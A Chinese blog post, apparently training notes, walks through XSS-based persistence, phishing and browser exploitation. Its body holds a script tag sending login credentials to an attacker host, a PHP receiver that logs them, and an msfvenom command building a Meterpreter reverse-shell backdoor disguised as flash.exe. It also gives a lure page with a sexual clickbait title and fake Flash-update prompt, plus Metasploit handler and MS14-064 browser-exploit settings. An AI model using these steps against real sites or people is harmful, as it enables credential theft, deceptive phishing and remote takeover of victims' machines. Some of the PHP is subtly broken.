Day37 WEB 攻防-通用漏洞&XSS 跨站&权限维持&钓鱼捆绑&浏览器漏洞

最新推荐文章于 2024-07-10 14:03:37 发布
最新推荐文章于 2024-07-10 14:03:37 发布
阅读量329 收藏 4
点赞数 3
文章标签: 前端 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73738451/article/details/137028264
版权

#知识点

1、XSS 跨站-另类攻击手法分类

2、XSS 跨站-权限维持&钓鱼&浏览器等

演示案例

Ø XSS-后台植入 Cookie&表单劫持

Ø XSS-Flash 钓鱼配合 MSF 捆绑上线

Ø XSS-浏览器网马配合 MSF 访问上线

#XSS-后台植入 Cookie&表单劫持

-条件:已取得相关 web 权限后,

思路成因:无法使用cookie登录、删掉后门、更改密码等原因无法持续登录后台,需要维持网站权限,同时已经有能力向源码内写入后门

1、写入代码到登录成功文件,利用 beef 或 xss 平台实时监控 Cookie 等凭据实现权 限维持

2、若存在同源策略或防护情况下,Cookie 获取失败可采用表单劫持或数据明文传输实

现,直接获取所需信息,例如账号密码

攻击payload:

<script src="http://www.your-ip.com/get.php?user=帐号&pass=密码"></script>

服务器接收PHP代码:

<?php
    $u=$ GET['user'];

    $p=$ GET['pass'];

    $myfile = fopen("newfile.txt", "w+");

    fwrite($myfile, $u);

    fwrite($myfile, "’);

    fwrite($myfile, $p);

    fwrite($myfile, '\n');

    fclose($myfile);

?>

#XSS-Flash 钓鱼配合 MSF 捆绑上线

-条件:beef 上线受控后或直接钓鱼(受害者爱看 SESE)

1、用msf生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe

2、下载官方文件-保证安装正常

3、压缩捆绑文件-解压提取运行

利用Restorator软件修改压缩包图标,而更真实

4、构造源码:

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>

<title>

    小迪与某主播SESE画面流出!

</title>

</head>

<body>

    小迪与某主播SESE画面流出!<br>

    <img src="t.gif" alt="" width="300" height=600" align="absmiddle"/ onclick=a()>

</body>

</html>

<script>

    function a(){

        alert("您的FASH版本过低,尝试升级后访问该页面!");

        window.location.href"http://47.94.236.117/";

    }

</script>

5、MSF 配置监听状态

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 6666

run

6、诱使受害者访问 URL-语言要适当

#XSS-浏览器网马配合 MSF 访问上线

-条件:beef 上线受控后或直接钓鱼(浏览器存在 0day)

1、配置 MSF 生成 URL

use exploit/windows/browser/ms14_064_ole_code_execution

set allowpowershellprompt true

set target 1

run

2、诱使受害者访问 URL-语言要适当

李八八8864
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第26天:WEB漏洞-XSS之订单及Shell箱子反杀记1
08-03
**XSS脚本攻击详解** XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取Cookie、操纵页面内容,甚至进行更复杂的攻击。...
Web高级知识-&amp;XSS;&amp;CSRF;解决方案
11-26
IP协议负责网络中的路由和寻址,而TCP协议则...同时,掌握域、XSS和CSRF的防范策略,是保障Web应用程序安全的基础。在实际开发中,应根据应用场景选择合适的连接方式,并严格实施安全措施,保护用户数据和系统安全。
day37WEB攻防-通用漏洞&XSS&权限维持&钓鱼捆绑&浏览器漏洞
m0_69583059的博客
02-01 1876
XSS-后台植入 Cookie&表单劫持(权限维持) 什么是权限维持,就是虽然我们获取到了网权限,但是并不能保证一直拥有权限,因为可能某一天对方的杀毒软件将我们植入的后门代码给删除了,那么就不能保证权限的持续,所以要获取管理员后台的登入账号密码,虽然可以通过获取Cookie值进行登入,但是如果在有防护的情况下获取到的Cookie值可能是错误的,这样就无法登入后台。当然我们在拥有权限的基础上,可以直接进入通过数据库查看账号密码,但是如果密码加密了呢,而且还是无法解密呢,虽然数据库里面也能获取到一些数据,但
小迪安全37WEB 攻防-通用漏洞&XSS &权限维持&钓鱼捆绑&浏览器漏洞
weixin_73760178的博客
03-10 990
(打包好木马,第一次解压时,设置为解压前的木马还没解压出来,无法执行,第二次执行时,前一次解压的木马已经出来了,所以解压前运行木马文件可以上线。本身对Cookie进行过滤,而xss平台只能解析一部分,Cookie用不了/解密不了。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行。劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、发表日志、邮件等;代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵。资料,从而获取用户隐私信息,或利用用户身份对网执行操作;
day37 XSS&权限维持&钓鱼捆绑&浏览器漏洞
wanjia01的博客
11-22 741
变量=
XSS三-WEB攻防-XSS&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
zyw268的博客
03-24 343
XSS-攻击利用-凭据盗取。XSS-攻击利用-数据提交。XSS-攻击利用-网络钓鱼。XSS-攻击利用-溯源综合。
【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训笔记(WEB攻防35-40-XSS、CSRF、SSRF)
qq_46343633的博客
12-22 1186
1、XSS-原理&攻击&分类等2、XSS-反射型&存储型&DOM型等3、XSS攻击手法&劫持&恣取凭据等4、XSS-攻击项目&XSS平台&Beef-XSS1、原理指改击者利用网程序对用户输入过不足,端入可以量示在页面上对其他用尸道成影响的HTML代码,从而盗取用户资料、利用用户具份进行某种动或者对访问者进行病毒侵害的一种攻击方式,通过在用户端注入恶意的可执行脚本,若服务器时用户的第人不进行处理或处理不严,则浏览器就会夏接执行用户注入的脚本。反馈与浏览。
小迪安全_web漏洞
weixin_44060420的博客
06-08 459
知识点:1、ASP环境搭建组合 asp 很少很少见了2、ASP数据库下载&植入3、S-短文件&解析&权限WEB安全攻防:1、Web源码2、开发语言3、中间件平台4、数据库类型4、第三方插件或软件演示案例:ASP-数据库-MDB默认下载ASP-数据库-ASP后门植入连接ASP-中间件-IS短文件名探针-安全漏洞ASP-中间件-IIS文件上传解析-安全漏洞ASP-中间件-IIS配置目录读写-安全配置。
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
lw19155275856的博客
03-14 200
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
网安之web攻防第三十七天
B_l_a_nk的博客
04-06 159
1、XSS-另类攻击手法分类 2、XSS-权限维持&钓鱼&浏览器
2024年网络安全最新网络安全-攻击篇-攻击载体_基于人的网络安全攻击 csdn(2)
2401_84240189的博客
05-02 612
勒索病毒(Ransomware)是一种恶意软件,这种病毒通常会利用各种漏洞和加密算法对被感染者的计算机文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。挖矿木马(Mining Malware)是一种恶意软件,将电脑、移动设备甚至是服务器变为矿机的木马,通常由挖矿团伙植入,用于挖掘比特币从而赚取利益。它会在受感染的计算机上运行,并利用计算机的资源来进行加密货币挖矿操作,从而赚取利润。
第28天:WEB漏洞-XSS之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
web漏洞之XSS_TEST漏洞实践练习代码
04-25
Web漏洞中的XSS(Cross Site Scripting)攻击是一种常见的安全问题,主要针对Web应用程序。XSS允许攻击者在用户浏览器中注入恶意脚本,从而控制用户的会话、窃取敏感信息或者执行其他恶意操作。本资源&quot;XSS_TEST漏洞...
95-web漏洞之XSS漏洞挖掘.pdf
03-15
95-web漏洞之XSS漏洞挖掘
一个使用Go语言和现代Web技术构建平台桌面应用程序开源项目
yunmoon的博客
07-10 768
Wails作为一个桥梁,连接强大的Go后端逻辑与丰富的Web前端界面,允许开发者利用两者的最佳特性来开发应用。
Webkit简介以及工作流程
最新发布
读心悦
07-10 248
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
Haproxy搭建Web群集
wkysdhr的博客
07-08 896
Haproxy 是目前比较流行的一种群集调度工具,同类群集调度工具有很多,如LVS 和Nginx。相比较而言,LVS 性能最好,但是搭建相对复杂;Nginx的upstream模块支持群集功能,但是对群集节点健康检查功能不强,高并发性能没有 Haproxy好。
JS混淆基本类型和原理
朴拙科技的博客
07-06 723
混淆技术为JS代码提供了一定程度的保护,但同时也给代码的维护和逆向工程带来了挑战。了解和掌握这些混淆技术的原理和解析方法,可以帮助开发者更好地保护或理解JS代码。然而,需要注意的是,混淆并不是万无一失的安全措施,它更多的是增加了攻击者理解代码的难度。在进行逆向工程时,应始终遵守法律法规,尊重知识产权,不要用于非法目的。
SP2019-LAB1.3&amp;1.4&amp;1.5-3170103456-应承峻1
08-03
WebGoat是一个广泛用于网络安全教育和实践的Java Web应用程序,它提供了丰富的实践环境,让学生学习并了解SQL注入(SQL Injection)和脚本攻击(XSS Attack)。 在Lab 1.3部分,学员被要求熟悉WebGoat的安装和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值